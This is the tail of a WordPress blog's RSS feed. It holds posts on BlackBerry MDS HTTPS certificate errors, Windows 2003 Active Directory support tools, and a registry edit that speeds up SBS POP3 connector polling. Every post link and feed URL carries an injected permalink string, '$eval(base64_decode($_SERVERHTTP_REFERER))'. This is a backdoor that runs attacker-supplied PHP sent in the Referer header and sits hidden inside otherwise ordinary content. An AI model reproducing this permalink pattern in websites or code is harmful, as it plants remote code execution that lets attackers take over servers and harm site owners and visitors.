<div class="heading" onclick="toggle('environment','imgenvironment'); "><img id="imgenvironment" style="vertical-align: text-bottom;" src="http://www.blackberry.com/btsc/RIMCUST/img/newTemplate/plus.png" alt="Expand" /><a name="environmentSection"></a>Environment</div>
<hr class="section" />
<div id="environment" class="section" style="display: none;">
<ul>
<li>BlackBerry® Enterprise Server 3.6 to 5.0 SP1</li>
<li>Java® Runtime Environment (JRE)</li>
</ul>
<ul>
<li class="backTop"><a href="http://apnaguy.com/wp-admin/#documentTop">Back to top</a></li>
</ul>
</div>
<div class="heading" onclick="toggle('additional_information','imgadditional_information');"><img id="imgadditional_information" style="vertical-align: text-bottom;" src="http://www.blackberry.com/btsc/RIMCUST/img/newTemplate/minus.png" alt="Collapse" /><a name="additional_informationSection"></a>Additional Information</div>
<hr class="section" />
<div id="additional_information" class="section">
<p>If the following error message appears in the BlackBerry MDS or the BlackBerry MDS log file after accessing an HTTPS site from a BlackBerry smartphone, it might be caused by the web server&#8217;s certificate not being added to the <strong>cacerts</strong> file:</p>
<p><strong>BlackBerry Enterprise Server 3.6 to 4.1 SP5</strong></p>
<blockquote style="margin-right: 0px;" dir="ltr">
<p class="code">&lt;MDS-CS_1&gt;:&lt;DEBUG&gt;:&lt;LAYER = IPPP, URL [https://testsite/test.css] SSLException<br />
[sun.security.validator.ValidatorException: PKIX path building failed:<br />
sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target]&gt;</p></blockquote>
<p><strong>BlackBerry Enterprise Server 4.1 SP6 to 4.1 SP7</strong></p>
<blockquote style="margin-right: 0px;" dir="ltr">
<p class="code">&lt;MDS-CS_SERVERNAME_MDS-CS_1&gt;:&lt;DEBUG&gt;:&lt;LAYER = IPPP, Access Denied: Insecure SSL Request&gt;</p>
</blockquote>
</div>
</div>
<p>*information was provided by blackberry technical solution center.</p>
<p><a href="http://www.blackberry.com/btsc/search.do?cmd=displayKC&amp;docType=kc&amp;externalId=KB20197" target="_blank">kb20197</a> and <a href="http://www.blackberry.com/btsc/search.do?cmd=displayKC&amp;docType=kc&amp;externalId=KB11623" target="_blank">kb11623</a></p>
]]></content:encoded>
			<wfw:commentRss>http://apnaguy.com/2010/08/09/how-to-configure-blackberry-mds-connection-service-to-perform-certificate-searches-using-ldaps/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Windows 2003 + Active Directory Support Tools</title>
		<link>http://apnaguy.com/2010/08/08/windows-2003-active-directory-support-tools/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/</link>
		<comments>http://apnaguy.com/2010/08/08/windows-2003-active-directory-support-tools/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/#comments</comments>
		<pubDate>Mon, 09 Aug 2010 05:30:05 +0000</pubDate>
		<dc:creator>d33pa</dc:creator>
				<category><![CDATA[Support]]></category>
		<category><![CDATA[active directory]]></category>
		<category><![CDATA[rename domain]]></category>
		<category><![CDATA[windows 2003 server]]></category>

		<guid isPermaLink="false">http://apnaguy.com/?p=62</guid>
		<description><![CDATA[I was looking for ways to show domain controller information and or changing domain controller name and came across a few pages on the net that helped me achieve this. You can download the kit from windows here: http://download.microsoft.com/download/3/e/4/3e438f5e-24ef-4637-abd1-981341d349c7/WindowsServer2003-KB892777-SupportTools-x86-ENU.exe other tools in the kit: http://technet.microsoft.com/en-us/library/cc773354%28WS.10%29.aspx this site is awesome for windows related support and how-to&#8217;s: [...]]]></description>
			<content:encoded><![CDATA[<p>I was looking for ways to show domain controller information and or changing domain controller name and came across a few pages on the net that helped me achieve this.</p>
<p>You can download the kit from windows here:</p>
<p>http://download.microsoft.com/download/3/e/4/3e438f5e-24ef-4637-abd1-981341d349c7/WindowsServer2003-KB892777-SupportTools-x86-ENU.exe</p>
<p>other tools in the kit:</p>
<p>http://technet.microsoft.com/en-us/library/cc773354%28WS.10%29.aspx</p>
<p>this site is awesome for windows related support and how-to&#8217;s:</p>
<p>http://www.petri.co.il/windows_2003_domain_rename.htm</p>
<p>http://www.petri.co.il/download_windows_2003_sp1_support_tools.htm</p>
<p>Honestly, this is just for my reference <img src='http://apnaguy.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://apnaguy.com/2010/08/08/windows-2003-active-directory-support-tools/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MS Windows 2003 SBS pop3 connector / Blackberry Enterprise Server Express</title>
		<link>http://apnaguy.com/2010/03/16/ms-windows-2003-sbs-pop3-connector/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/</link>
		<comments>http://apnaguy.com/2010/03/16/ms-windows-2003-sbs-pop3-connector/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/#comments</comments>
		<pubDate>Tue, 16 Mar 2010 22:50:55 +0000</pubDate>
		<dc:creator>d33pa</dc:creator>
				<category><![CDATA[Support]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[5.0.1]]></category>
		<category><![CDATA[blackberry enterprise server]]></category>
		<category><![CDATA[Blackberry Research in Motion]]></category>
		<category><![CDATA[microsoft small business server 2003]]></category>
		<category><![CDATA[pop3 connector]]></category>
		<category><![CDATA[win2k3 sbs]]></category>

		<guid isPermaLink="false">http://apnaguy.com/?p=53</guid>
		<description><![CDATA[I have built a new server on VMWare to accommodate the new Blackberry Enterprise Server Express 5.0.1 that was just recently released. I was quite ecstatic to hear RIM was giving this up for free. Since I had a 5 CAL license for Windows 2003 Small Business Server, I setup this on my VM, which [...]]]></description>
			<content:encoded><![CDATA[<p>I have built a new server on VMWare to accommodate the new Blackberry Enterprise Server Express 5.0.1 that was just recently released. I was quite ecstatic to hear RIM was giving this up for free. Since I had a 5 CAL license for Windows 2003 Small Business Server, I setup this on my VM, which also included Exchange Server 2003. Setup was easy, did all the updates to this ancient OS. Then setup the BESX on the same server. Since I only plan to host personal/SOHO domain, this is totally acceptable. Blackberry suggests I can have upto 75 users on this server. The server itself is pretty decent &#8211; Xeon, 4GB ECC Ram, Raid5.</p>
<p>Blackberry has this great video tutorial that shows how to set the BESX up in a jiffy.</p>
<p>you can view the video <a title="here" href="https://www.blackberry.com/blackberrytraining/web/_content/indexExternal.html?cc=3731382d30323036335f42455358496e7374616c6c&amp;cx=3230393930313031&amp;cl=656e&amp;cg=636f6e6669675f6c6f76655f707572706c652e786d6c" target="_blank">here</a></p>
<p>Going forward, I had redirected my domains email to the exchange server, this entailed me to purchase anti spam software as it was getting ridiculous with out it.</p>
<p>What I decided to do is activate POP3 Connector which comes with the SBS 2003 OS. The downside was that it only polls every 15 minimum. Boo! Doesnt that defeat having push email to the blackberry?</p>
<p>Well I found a reg edit hack that will accelerate the polling.</p>
<p>You can set the polling interval in the GUI if you view the properties  of<br />
the POP3 Connector Manager, and then click the &#8220;Scheduling&#8221; tab. To  set the<br />
polling interval so that polling occurs more frequently than every  15<br />
minutes, you must configure the ScheduleAccelerator registry entry.</p>
<p>1. Locate and then click the following registry subkey:</p>
<p>&#8220;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SmallBusinessServer\Network\POP3<br />
Connector&#8221;</p>
<p>2. On the &#8220;Edit&#8221; menu, point to &#8220;New&#8221;, and then click &#8220;DWORD Value&#8221;.</p>
<p>3. Type &#8220;ScheduleAccelerator&#8221; (without the quotation marks) as the  entry<br />
name, and then press ENTER.</p>
<p>5. On the &#8220;Edit&#8221; menu, click &#8220;Modify&#8221;.</p>
<p>6. In the &#8220;Value data&#8221; box, click decimal, type the value that you want, and then  click<br />
&#8220;OK&#8221;. To determine the polling interval, the value that is  configured on the<br />
&#8220;Scheduling&#8221; tab in the GUI is divided by the value that you type  for the<br />
ScheduleAccelerator entry. For example, if a 15 minute interval is  specified<br />
in the GUI and you set the value of the ScheduleAccelerator entry to  3, the<br />
connector will poll ever five minutes.</p>
<p>7. Quit Registry Editor</p>
]]></content:encoded>
			<wfw:commentRss>http://apnaguy.com/2010/03/16/ms-windows-2003-sbs-pop3-connector/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

